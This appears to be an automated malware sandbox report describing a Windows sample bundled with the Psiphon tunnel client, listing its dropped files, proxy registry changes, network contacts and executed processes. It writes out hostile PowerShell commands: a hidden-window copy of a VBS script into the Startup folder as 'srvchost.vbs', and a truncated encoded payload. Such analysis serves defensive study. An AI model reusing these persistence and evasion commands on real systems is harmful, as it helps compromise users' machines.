Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- %APPDATA%\microsoft\windows\start menu\programs\startup\srvchost.vbs
Malicious functions
Modifies settings of Windows Internet Explorer
- [<HKCU>\Software\Microsoft\windows\CurrentVersion\Internet Settings] 'ProxyEnable' = '00000001'
- [<HKCU>\Software\Microsoft\windows\CurrentVersion\Internet Settings] 'ProxyServer' = 'http=127.0.0.1:49177;https=127.0.0.1:49177;socks=127.0.0.1:49176'
- [<HKCU>\Software\Microsoft\windows\CurrentVersion\Internet Settings] 'ProxyOverride' = '<local>'
Modifies file system
Creates the following files
- %TEMP%\uatqqfkewlsv.exe
- %APPDATA%\psiphon3\ca.psiphon.psiphontunnel.tunnel-core\upgrade.178.part.etag
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\index.dat
- %APPDATA%\microsoft\windows\cookies\low\index.dat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\xc03kxza\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\28krlgwh\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\o3g4skox\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\ypn324h7\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\logo[1]
- %APPDATA%\psiphon3\ca.psiphon.psiphontunnel.tunnel-core\datastore\psiphon.boltdb
- %APPDATA%\psiphon3\ca.psiphon.psiphontunnel.tunnel-core\upgrade.178.part
- %TEMP%\psiphon-tunnel-core.exe
- %APPDATA%\psiphon3\psiphon.config
- %APPDATA%\psiphon3\psicash\psicashdatastore.prod.temp
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\banner[1]
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\flag_unknown_32[1]
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\flags32[1]
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\rocket[1]
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\psicash_coin_grey[1]
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\psicash_coin[1]
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\turtle[1]
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\logo-bw[1]
- %TEMP%\datc699.tmp
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\icomoon[1]
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\main[1]
- %TEMP%\bqvn.vbs
- %APPDATA%\psiphon3\server_list.dat
- %LOCALAPPDATA%\microsoft\windows\history\history.ie5\mshist012023021120230212\index.dat
Sets the 'hidden' attribute to the following files
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\ypn324h7\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\o3g4skox\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\28krlgwh\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\xc03kxza\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
Deletes the following files
- %APPDATA%\psiphon3\psicash\psicashdatastore.prod
- %APPDATA%\psiphon3\ca.psiphon.psiphontunnel.tunnel-core\upgrade.178.part.etag
Moves the following files
- from %APPDATA%\psiphon3\psicash\psicashdatastore.prod.temp to %APPDATA%\psiphon3\psicash\psicashdatastore.prod.commit
- from %APPDATA%\psiphon3\psicash\psicashdatastore.prod.commit to %APPDATA%\psiphon3\psicash\psicashdatastore.prod
- from %APPDATA%\psiphon3\ca.psiphon.psiphontunnel.tunnel-core\upgrade.178.part to %APPDATA%\psiphon3\ca.psiphon.psiphontunnel.tunnel-core\upgrade.178
- from %APPDATA%\psiphon3\ca.psiphon.psiphontunnel.tunnel-core\upgrade.178 to %APPDATA%\psiphon3\ca.psiphon.psiphontunnel.tunnel-core\upgrade
- from %TEMP%\uatqqfkewlsv.exe to %TEMP%\uatqqfkewlsv.exe.orig
Modifies the following files
Substitutes the following files
- %APPDATA%\psiphon3\psicash\psicashdatastore.prod.temp
- %APPDATA%\psiphon3\psicash\psicashdatastore.prod.commit
- %APPDATA%\psiphon3\psicash\psicashdatastore.prod
- %TEMP%\uatqqfkewlsv.exe
Network activity
Connects to
- 'a5##.#a.akamai.net':443
- 'a9##.#.akamai.net':443
- 'a1###.q.akamai.net':443
- '10#.#7.177.188':443
- '95.##4.64.142':443
- 'pr##.##obal.fastly.net':443
- '10#.#8.151.190':443
- '77.#8.40.37':22
- '88.##8.244.56':53
- '45.##3.183.206':554
- '10#.#61.20.175':22
- '10#.#8.153.190':443
- 'ap#.#si.cash':443
- '37.##8.246.243':53
- '21#.#71.207.155':443
- '31.#.152.207':22
- '18#.#89.115.75':22
- '10#.#7.228.2':443
- 'a1###.na.akamai.net':80
- '77.##.41.116':443
- '19#.#40.126.131':22
- '21#.#08.105.243':22
- '87.##1.93.108':443
- 'pr##.###bal.ssl.fastly.net':80
- '77.##.41.144':22
- '82.##5.251.80':554
- 'localhost':49177
TCP
HTTP GET requests
- http://x.##2.us/x.cer
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
- http://oc##.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
- http://st####.rapidssl.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRhhZrQET0hvbSHUJmNfBKqR%2FiT7wQUU8oXWfxrwAMhLxqu5KqoHIJW2nUCEAI6oJP8gn8D%2F19dd4BsEgc%3D
- http://st####.rapidssl.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRhhZrQET0hvbSHUJmNfBKqR%2FiT7wQUU8oXWfxrwAMhLxqu5KqoHIJW2nUCEA8RAzFf4a7BlufTueeio%2F0%3D
HTTP POST requests
- http://www.ba#####joasiafilm.com/
- http://www.lo####ilbanking.com/
Other
- 'a5##.#a.akamai.net':443
- 'localhost':49207
- 'localhost':49177
- 'localhost':49208
- 'localhost':49209
- 'localhost':49211
- 'localhost':49210
- 'localhost':49213
- 'localhost':49205
- 'localhost':49206
- 'localhost':49212
- 'localhost':49216
- 'localhost':49217
- 'localhost':49218
- 'localhost':49221
- 'localhost':49220
- 'localhost':49223
- 'localhost':49222
- 'localhost':49214
- 'localhost':49215
- 'ap#.#si.cash':443
- 'a1###.q.akamai.net':443
- '95.##4.64.142':443
- '21#.#08.105.243':22
- '19#.#40.126.131':22
- '87.##1.93.108':443
- '77.##.41.116':443
- '10#.#7.228.2':443
- '82.##5.251.80':554
- '21#.#71.207.155':443
- '31.#.152.207':22
- '77.##.41.144':22
- '18#.#89.115.75':22
- '10#.#61.20.175':22
- '45.##3.183.206':554
- '10#.#8.153.190':443
- '10#.#8.151.190':443
- '77.#8.40.37':22
- '88.##8.244.56':53
- 'pr##.##obal.fastly.net':443
- '10#.#7.177.188':443
- '37.##8.246.243':53
- 'localhost':49224
- 'localhost':49225
UDP
- DNS ASK a5##.#a.akamai.net
- DNS ASK pr##.###bal.ssl.fastly.net
- DNS ASK a1###.na.akamai.net
- DNS ASK
- DNS ASK pr##.##obal.fastly.net
- DNS ASK a1###.q.akamai.net
- DNS ASK a9##.#.akamai.net
- DNS ASK ap#.#si.cash
- '82.##3.108.106':554
- '88.##8.229.232':443
- '10#.#91.102.86':23
- '79.##2.76.181':53
- '21#.#08.105.49':554
- '92.##9.179.202':53
- '21#.#08.105.217':53
Miscellaneous
Searches for the following windows
- ClassName: 'Internet Explorer_Server' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- ClassName: 'Static' WindowName: ''
Creates and executes the following
- '%TEMP%\uatqqfkewlsv.exe'
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\Bqvn.vbs"
- '%TEMP%\psiphon-tunnel-core.exe' --config "%APPDATA%\Psiphon3\psiphon.config" --serverList "%APPDATA%\Psiphon3\server_list.dat"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '%TEMP%\Bqvn.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\srvchost.vbs';
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '%TEMP%\Bqvn.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\srvchost.vbs';' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABzAHIAdgBjAGgAbwBzAHQAXAApAC4AcwByAHYAYwBoA...' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\syswow64\WININET.dll",DispatchAPICall 1
- '%ProgramFiles(x86)%\internet explorer\iexplore.exe' https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=RU&client_asn=35526&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxy...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABzAHIAdgBjAGgAbwBzAHQAXAApAC4AcwByAHYAYwBoA...
